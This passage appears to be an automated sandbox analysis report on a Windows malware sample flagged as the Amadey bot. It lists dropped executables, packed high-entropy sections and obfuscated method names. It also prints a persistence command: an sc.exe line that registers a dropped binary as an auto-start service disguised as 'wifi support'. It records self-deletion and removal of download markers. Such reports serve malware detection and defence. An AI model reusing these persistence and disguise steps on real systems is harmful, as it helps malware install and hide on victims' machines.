                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeCode function: 16_2_00412CA4 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeCode function: 16_2_004B127E push edi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeCode function: 16_2_004B123C push edi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeCode function: 16_2_004B735E push esp; iretd
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeCode function: 16_2_004B53C8 pushfd ; retf
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_004139B0 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00583C00 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_0043DFD4 push es; retn 0042h
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_00D78508 push 00000028h; retf 0000h
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_00D7764A push esp; ret
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_019C4003 push esi; retf
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_032FCF38 pushad ; retf
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_032FCF78 pushfd ; retf
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_032FD4EA push esp; iretd
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_05772504 push E80A995Eh; ret
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_00658508 push 00000028h; retf 0000h
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_0065764A push esp; ret
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_00F70179 push edi; retf
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_00F704AF push ecx; retf
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_00F70440 push ecx; retf
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_00F73C58 push esp; iretd
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_05CEEC39 push eax; retf
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 0_2_0042D810 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                          Source: 27D7.exe.10.drStatic PE information: 0xAB35ADD6 [Sat Jan 8 14:57:26 2061 UTC]
                          Source: eIxMVDoQF3.exeStatic PE information: section name: .semunil
                          Source: eIxMVDoQF3.exeStatic PE information: section name: .wanexic
                          Source: eIxMVDoQF3.exeStatic PE information: section name: .sutolac
                          Source: F6C0.exe.10.drStatic PE information: section name: .gizi
                          Source: F6C0.exe.10.drStatic PE information: section name: .bur
                          Source: F6C0.exe.10.drStatic PE information: section name: .wob
                          Source: 6CF.exe.10.drStatic PE information: section name:
                          Source: 6CF.exe.10.drStatic PE information: section name:
                          Source: 6CF.exe.10.drStatic PE information: section name:
                          Source: 6CF.exe.10.drStatic PE information: section name:
                          Source: 6CF.exe.10.drStatic PE information: section name:
                          Source: 6CF.exe.10.drStatic PE information: section name:
                          Source: 6CF.exe.10.drStatic PE information: section name: .28gybOo
                          Source: 6CF.exe.10.drStatic PE information: section name: .adata
                          Source: 1547.exe.10.drStatic PE information: section name:
                          Source: 1547.exe.10.drStatic PE information: section name:
                          Source: 1547.exe.10.drStatic PE information: section name:
                          Source: 1547.exe.10.drStatic PE information: section name:
                          Source: 1547.exe.10.drStatic PE information: section name:
                          Source: 1547.exe.10.drStatic PE information: section name:
                          Source: 1547.exe.10.drStatic PE information: section name: .28gybOo
                          Source: 1547.exe.10.drStatic PE information: section name: .adata
                          Source: 27D7.exe.10.drStatic PE information: section name: .didata
                          Source: 3A08.exe.10.drStatic PE information: section name:
                          Source: 3A08.exe.10.drStatic PE information: section name:
                          Source: 3A08.exe.10.drStatic PE information: section name:
                          Source: 3A08.exe.10.drStatic PE information: section name:
                          Source: 3A08.exe.10.drStatic PE information: section name:
                          Source: 3A08.exe.10.drStatic PE information: section name:
                          Source: 3A08.exe.10.drStatic PE information: section name: .Pl7qR7h
                          Source: 3A08.exe.10.drStatic PE information: section name: .adata
                          Source: B50.exe.10.drStatic PE information: section name: .dubom
                          Source: B50.exe.10.drStatic PE information: section name: .xak
                          Source: B50.exe.10.drStatic PE information: section name: .zawaxig
                          Source: 743F.exe.10.drStatic PE information: section name: .lemel
                          Source: 743F.exe.10.drStatic PE information: section name: .lobil
                          Source: 743F.exe.10.drStatic PE information: section name: .cixu
                          Source: rwjfsvd.10.drStatic PE information: section name: .semunil
                          Source: rwjfsvd.10.drStatic PE information: section name: .wanexic
                          Source: rwjfsvd.10.drStatic PE information: section name: .sutolac
                          Source: tvdcssmj.exe.24.drStatic PE information: section name: .lemel
                          Source: tvdcssmj.exe.24.drStatic PE information: section name: .lobil
                          Source: tvdcssmj.exe.24.drStatic PE information: section name: .cixu
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .didata
                          Source: 7D0A.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x9011f
                          Source: 6CF.exe.10.drStatic PE information: real checksum: 0x3721bb should be: 0x373654
                          Source: 3A08.exe.10.drStatic PE information: real checksum: 0x3834f6 should be: 0x36dbab
                          Source: 1547.exe.10.drStatic PE information: real checksum: 0x3721bb should be: 0x373654
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.96128560054
                          Source: initial sampleStatic PE information: section name: .text entropy: 7.2566886804
                          Source: initial sampleStatic PE information: section name: entropy: 7.99714766582
                          Source: initial sampleStatic PE information: section name: entropy: 7.90784224501
                          Source: initial sampleStatic PE information: section name: entropy: 7.99361781473
                          Source: initial sampleStatic PE information: section name: entropy: 7.80912989946
                          Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22348700263
                          Source: initial sampleStatic PE information: section name: .28gybOo entropy: 7.91849564721
                          Source: initial sampleStatic PE information: section name: entropy: 7.99714766582
                          Source: initial sampleStatic PE information: section name: entropy: 7.90784224501
                          Source: initial sampleStatic PE information: section name: entropy: 7.99361781473
                          Source: initial sampleStatic PE information: section name: entropy: 7.80912989946
                          Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22348700263
                          Source: initial sampleStatic PE information: section name: .28gybOo entropy: 7.91849564721
                          Source: initial sampleStatic PE information: section name: .didata entropy: 7.99713235918
                          Source: initial sampleStatic PE information: section name: entropy: 7.99344683632
                          Source: initial sampleStatic PE information: section name: entropy: 7.99371358219
                          Source: initial sampleStatic PE information: section name: entropy: 7.79109482623
                          Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.9972805435
                          Source: initial sampleStatic PE information: section name: .Pl7qR7h entropy: 7.92006986154
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.97903436924
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.95592725044
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.96128560054
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.95592725044
                          Source: 7D0A.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 7D0A.exe.10.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 25.2.7D0A.exe.d70000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 25.2.7D0A.exe.d70000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 25.0.7D0A.exe.d70000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 25.0.7D0A.exe.d70000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 25.0.7D0A.exe.d70000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 25.0.7D0A.exe.d70000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 25.0.7D0A.exe.d70000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 25.0.7D0A.exe.d70000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 25.0.7D0A.exe.d70000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 25.0.7D0A.exe.d70000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 37.0.7D0A.exe.650000.7.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 37.0.7D0A.exe.650000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 37.0.7D0A.exe.650000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 37.0.7D0A.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 37.0.7D0A.exe.650000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 37.0.7D0A.exe.650000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 37.0.7D0A.exe.650000.11.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 37.0.7D0A.exe.650000.11.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 37.0.7D0A.exe.650000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 37.0.7D0A.exe.650000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 37.0.7D0A.exe.650000.9.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 37.0.7D0A.exe.650000.9.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'

                          Persistence and Installation Behavior:

                          barindex
                          Yara detected Amadey botShow sources
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rwjfsvdJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E5C8.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1547.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F6C0.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3A08.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeFile created: C:\Users\user\AppData\Local\Temp\tvdcssmj.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7D0A.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rwjfsvdJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1FD7.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B50.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\27D7.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\icpymrdv\tvdcssmj.exe (copy)Jump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F805.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\743F.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6CF.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\icpymrdv\tvdcssmj.exe (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" create icpymrdv binPath= "C:\Windows\SysWOW64\icpymrdv\tvdcssmj.exe /d\"C:\Users\user\AppData\Local\Temp\743F.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          Hooking and other Techniques for Hiding and Protection:

                          barindex
                          Deletes itself after installationShow sources
                          Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\eixmvdoqf3.exeJump to behavior
                          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                          Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\rwjfsvd:Zone.Identifier read attributes | delete
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
